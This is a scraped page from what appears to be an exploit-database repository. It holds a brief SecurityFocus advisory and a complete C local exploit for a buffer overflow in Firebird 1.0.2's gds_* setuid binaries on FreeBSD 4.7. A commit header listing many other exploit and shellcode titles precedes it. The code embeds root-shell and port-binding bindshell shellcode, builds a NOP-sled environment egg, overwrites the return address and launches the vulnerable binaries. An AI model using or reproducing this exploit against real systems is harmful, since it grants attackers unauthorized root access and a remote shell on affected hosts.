880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
167 lines
No EOL
4.9 KiB
C
167 lines
No EOL
4.9 KiB
C
// source: https://www.securityfocus.com/bid/5044/info
|
|
|
|
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
|
|
|
|
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.
|
|
|
|
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue.
|
|
|
|
/* DSR-firebird.c by bob@dtors.net
|
|
-------------------------------
|
|
|
|
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
|
|
|
|
bash-2.05a$ ./DSR-firebird
|
|
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
|
|
( ( by - bob@dtors.net ) )
|
|
----------------------------------------------------
|
|
|
|
Usage: ./DSR-firebird <target#>
|
|
Targets:
|
|
1. [0xbfbff75d] - gds_inet_server
|
|
2. [0xbfbff75c] - gds_lock_mgr
|
|
3. [0xbfbff75e] - gds_drop
|
|
|
|
www.dtors.net
|
|
bash-2.05a$
|
|
|
|
Thanks goto eSDee && ilja for helping me
|
|
with the gds_lock_mgr problems.
|
|
|
|
bob@dtors.net
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#define LOCK "/usr/local/firebird/bin/gds_lock_mgr"
|
|
#define DROP "/usr/local/firebird/bin/gds_drop"
|
|
#define INET "/usr/local/firebird/bin/gds_inet_server"
|
|
#define LEN 1056
|
|
|
|
char dropcode[]=
|
|
"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
|
|
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
|
|
"\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
|
|
"\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
|
|
|
|
char inetcode[]=
|
|
"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
|
|
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
|
|
"\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
|
|
"\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
|
|
|
|
|
|
|
|
char lockcode[]=
|
|
"\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
|
|
"\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"
|
|
"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" file://setuid[firebird] by bob
|
|
"\x31\xc0\x31\xdb\x53\xb3\x06\x53" file://fork() bindshell by eSDee
|
|
"\xb3\x01\x53\xb3\x02\x53\x54\xb0"
|
|
"\x61\xcd\x80\x89\xc7\x31\xc0\x50"
|
|
"\x50\x50\x66\x68\xb0\xef\xb7\x02"
|
|
"\x66\x53\x89\xe1\x31\xdb\xb3\x10"
|
|
"\x53\x51\x57\x50\xb0\x68\xcd\x80"
|
|
"\x31\xdb\x39\xc3\x74\x06\x31\xc0"
|
|
"\xb0\x01\xcd\x80\x31\xc0\x50\x57"
|
|
"\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
|
|
"\xdb\x50\x89\xe1\xb3\x01\x53\x89"
|
|
"\xe2\x50\x51\x52\xb3\x14\x53\x50"
|
|
"\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
|
|
"\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
|
|
"\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
|
|
"\x39\xc3\x75\x44\x31\xc0\x57\x50"
|
|
"\xb0\x06\xcd\x80\x31\xc0\x50\x56"
|
|
"\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
|
|
"\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
|
|
"\x80\x31\xc0\x43\x53\x56\x50\xb0"
|
|
"\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
|
|
"\x2f\x73\x68\x68\x2f\x62\x69\x6e"
|
|
"\x89\xe3\x50\x54\x53\x50\xb0\x3b"
|
|
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
|
|
"\x31\xc0\x56\x50\xb0\x06\xcd\x80"
|
|
"\xeb\x9a";
|
|
|
|
char *decide(char *string)
|
|
{
|
|
if(!(strcmp(string, "1")))
|
|
return((char *)&inetcode);
|
|
if(!(strcmp(string, "2")))
|
|
return((char *)&lockcode);
|
|
if(!(strcmp(string, "3")))
|
|
return((char *)&dropcode);
|
|
exit(0);
|
|
}
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
|
|
unsigned long ret = 0xbfbff743;
|
|
|
|
char *selectcode;
|
|
char buffer[LEN];
|
|
char egg[1024];
|
|
char *ptr;
|
|
int i=0;
|
|
|
|
|
|
|
|
if(argc < 2)
|
|
{
|
|
printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n");
|
|
printf("( ( by - bob@dtors.net ) )\n");
|
|
printf("----------------------------------------------------\n\n");
|
|
printf("Usage: %s <target#> \n", argv[0]);
|
|
printf("Targets:\n");
|
|
printf("1. [0xbfbff743] - gds_inet_server\n");
|
|
printf("2. [0xbfbff743] - gds_lock_mgr\n");
|
|
printf("3. [0xbfbff743] - gds_drop\n");
|
|
printf("\nwww.dtors.net\n");
|
|
exit(0);
|
|
}
|
|
|
|
selectcode = (char *)decide(argv[1]);
|
|
memset(buffer, 0x41, sizeof(buffer));
|
|
|
|
ptr = egg;
|
|
|
|
for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
|
|
for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
|
|
egg[1024 - 1] = '\0';
|
|
|
|
memcpy(egg,"EGG=",4);
|
|
putenv(egg);
|
|
|
|
memcpy(&buffer[1052],(char *)&ret,4);
|
|
buffer[1056] = 0;
|
|
|
|
setenv("INTERBASE", buffer, 1);
|
|
|
|
fprintf(stdout, "Return Address: 0x%x\n", ret);
|
|
fprintf(stdout, "Buffer Size: %d\n", LEN);
|
|
fprintf(stdout, "Setuid [90]\n");
|
|
|
|
if(selectcode == (char *)&inetcode)
|
|
{
|
|
execl(INET, INET, NULL);
|
|
return 0;
|
|
}
|
|
|
|
if(selectcode == (char *)&lockcode)
|
|
{
|
|
printf("\nShell is on port 45295\nExploit will hang!\n");
|
|
execl(LOCK, LOCK, NULL);
|
|
return 0;
|
|
}
|
|
|
|
if(selectcode == (char *)&dropcode)
|
|
{
|
|
execl(DROP, DROP, NULL);
|
|
return 0;
|
|
}
|
|
|
|
|
|
return 0;
|
|
} |